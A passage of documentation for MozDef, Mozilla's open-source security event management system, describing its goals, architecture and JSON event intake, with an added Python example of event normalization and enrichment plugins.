  • Automate interfaces to other systems like firewalls, cloud protections and anything that has an API
  • Provide metrics for security events and incidents
  • Facilitate real-time collaboration amongst incident handlers
  • Facilitate repeatable, predictable processes for incident handling
  • Go beyond traditional SIEM systems in automating incident handling, information sharing, workflow, metrics and response automation

Technical
  • Offer micro services that make up an Open Source Security Information and Event Management (SIEM)
  • Scalable, should be able to handle thousands of events per second, provide fast searching, alerting, correlation and handle interactions between teams of incident handlers.

MozDef aims to provide traditional SIEM functionality including:
  • Accepting events/logs from a variety of systems
  • Storing events/logs
  • Facilitating searches
  • Facilitating alerting
  • Facilitating log management (archiving, restoration)

It is non-traditional in that it:
  • Accepts only JSON input
  • Provides you open access to your data
  • Integrates with a variety of log shippers including logstash, beaver, nxlog, syslog-ng and any shipper that can send JSON to either rabbit-mq or an HTTP(s) endpoint.
  • Provides easy integration to Cloud-based data sources such as cloudtrail or guard duty
  • Provides easy python plugins to manipulate your data in transit
  • Provides extensive plug-in opportunities to customize your event enrichment stream, your alert workflow, etc
  • Provides realtime access to teams of incident responders to allow each other to see their work simultaneously

Architecture

MozDef is based on open source technologies including:
  • Nginx (http(s)-based log input)
  • RabbitMQ (message queue and amqp(s)-based log input)
  • uWSGI (supervisory control of python-based workers)
  • bottle.py (simple python interface for web request handling)
  • elasticsearch (scalable indexing and searching of JSON documents)
  • Meteor (responsive framework for Node.js enabling real-time data sharing)
  • MongoDB (scalable data store, tightly integrated to Meteor)
  • VERIS from verizon (open source taxonomy of security incident categorizations)
  • d3 (javascript library for data driven documents)
  • dc.js (javascript wrapper for d3 providing common charts, graphs)
  • three.js (javascript library for 3d visualizations)
  • Firefox (a snappy little web browser)


Frontend processing

Frontend processing for MozDef consists of receiving an event/log (in JSON) over HTTP(S), AMQP(S), or SQS, doing data transformation including normalization, adding metadata, etc., and pushing the data to elasticsearch.

Internally MozDef uses RabbitMQ to queue events that are still to be processed. The diagram in the original documentation (not reproduced here) shows the interactions between the python scripts (controlled by uWSGI), the RabbitMQ exchanges and elasticsearch indices.
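To make the frontend step concrete, the block below is an added example and not MozDef's own code. It reduces that step to one function: accept only JSON objects (anything else is rejected before it reaches the queue, matching the "accepts only JSON input" property above), normalize the timestamp and severity, run optional in-transit plugins of the kind the feature list mentions, add receipt metadata, and return the document together with the index it would be written to. The field names (utctimestamp, receivedtimestamp, severity, category, details, tags, source) and the events-YYYYMMDD index naming are assumptions for this example, not MozDef's schema; the sample plugin and sample events are constructed.

```python
"""Added example, not MozDef's own code: a minimal JSON-only event intake
with normalization, plugin hooks and receipt metadata. Field names and the
index naming scheme are assumptions for this example."""
import ipaddress
import json
from datetime import datetime, timezone


class RejectedEvent(ValueError):
    """Input that must not enter the pipeline: not JSON, not an object, or dropped."""


def _to_utc_iso(value):
    """Accept epoch seconds or an ISO-8601 string; return ISO-8601 in UTC."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        dt = datetime.fromtimestamp(value, timezone.utc)
    else:
        text = str(value).strip()
        if text.endswith("Z"):            # fromisoformat() before 3.11 lacks 'Z'
            text = text[:-1] + "+00:00"
        dt = datetime.fromisoformat(text)
        if dt.tzinfo is None:             # naive timestamps are treated as UTC
            dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc).isoformat()


def normalize_event(raw, received_at, source="http", plugins=()):
    """raw: request body as received (str/bytes); received_at: epoch seconds.
    Returns (index_name, document)."""
    try:
        event = json.loads(raw)
    except (TypeError, ValueError) as exc:
        raise RejectedEvent(f"not JSON: {exc}") from None
    if not isinstance(event, dict):
        raise RejectedEvent("event must be a JSON object")

    doc = dict(event)
    received_iso = _to_utc_iso(received_at)
    # Normalization: consistent timestamp, severity and category values.
    doc["utctimestamp"] = (_to_utc_iso(event["utctimestamp"])
                           if "utctimestamp" in event else received_iso)
    doc["severity"] = str(event.get("severity", "INFO")).upper()
    doc["category"] = str(event.get("category", "event")).lower()
    doc.setdefault("details", {})
    # Metadata added on receipt: when it arrived and through which input.
    doc["receivedtimestamp"] = received_iso
    doc["source"] = source

    for plugin in plugins:                # in-transit enrichment hooks
        doc = plugin(doc)
        if doc is None:                   # a plugin may drop the event
            raise RejectedEvent("dropped by plugin")

    index = "events-" + doc["utctimestamp"][:10].replace("-", "")
    return index, doc


def is_accepted(raw, received_at=0):
    """Convenience predicate: would this body enter the pipeline?"""
    try:
        normalize_event(raw, received_at)
        return True
    except RejectedEvent:
        return False


def tag_private_source(doc):
    """Sample plugin (constructed): tag events whose details.sourceipaddress
    is a private (RFC 1918 / ULA) address."""
    ip = doc.get("details", {}).get("sourceipaddress")
    try:
        if ip and ipaddress.ip_address(ip).is_private:
            doc.setdefault("tags", []).append("internal")
    except ValueError:
        pass                              # leave malformed addresses untagged
    return doc


if __name__ == "__main__":
    sample = '{"severity": "warning", "utctimestamp": 1700000000, "summary": "login failed", "details": {"sourceipaddress": "10.1.2.3"}}'
    print(normalize_event(sample, received_at=1700000100, plugins=(tag_private_source,)))
    print("accepted non-JSON?", is_accepted("not json"))
```

Rejecting non-object input at the edge is what keeps every later stage (enrichment plugins, alert rules, the index mapping) free of type checks, which is the practical benefit of a JSON-only contract.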


Status:
MozDef is in production at Mozilla where we are using it to process over 300 million events per day.


